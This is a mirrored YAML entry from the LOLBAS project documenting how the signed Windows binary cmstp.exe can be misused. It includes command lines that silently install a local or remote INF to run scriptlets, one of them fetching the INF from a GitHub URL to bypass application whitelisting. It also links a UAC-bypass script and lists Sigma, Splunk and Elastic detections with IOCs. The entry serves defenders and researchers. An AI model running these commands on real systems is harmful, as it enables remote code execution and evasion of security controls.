mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-30 16:54:00 +01:00
23dd0236ae
* Add detection links for scripts * Add detection links for OtherMSBins. Fixed and updated as needed. * Add detection links for MSBins. Fixed and updated as needed. * Add detection links for oslibraries * Updating template for Detections * Removing empty Detection:Sigma entries * Remove redundant blank line * Replacing commit URL with file URL Co-authored-by: root <root@DESKTOP-5CR935D.localdomain> Co-authored-by: Wietze <wietze@users.noreply.github.com>
48 lines
2.9 KiB
YAML
48 lines
2.9 KiB
YAML
---
|
|
Name: Cmstp.exe
|
|
Description: Installs or removes a Connection Manager service profile.
|
|
Author: 'Oddvar Moe'
|
|
Created: 2018-05-25
|
|
Commands:
|
|
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
|
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
|
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
|
Category: Execute
|
|
Privileges: User
|
|
MitreID: T1218.003
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
|
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
|
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
|
Category: AwL bypass
|
|
Privileges: User
|
|
MitreID: T1218.003
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
Full_Path:
|
|
- Path: C:\Windows\System32\cmstp.exe
|
|
- Path: C:\Windows\SysWOW64\cmstp.exe
|
|
Code_Sample:
|
|
- Code:
|
|
Detection:
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
|
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
|
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
|
- IOC: Execution of cmstp.exe without a VPN use case is suspicious
|
|
- IOC: DotNet CLR libraries loaded into cmstp.exe
|
|
- IOC: DotNet CLR Usage Log - cmstp.exe.log
|
|
Resources:
|
|
- Link: https://twitter.com/NickTyrer/status/958450014111633408
|
|
- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
|
|
- Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
|
|
- Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
|
|
- Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
|
|
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
|
|
Acknowledgement:
|
|
- Person: Oddvar Moe
|
|
Handle: '@oddvarmoe'
|
|
- Person: Nick Tyrer
|
|
Handle: '@NickTyrer'
|
|
---
|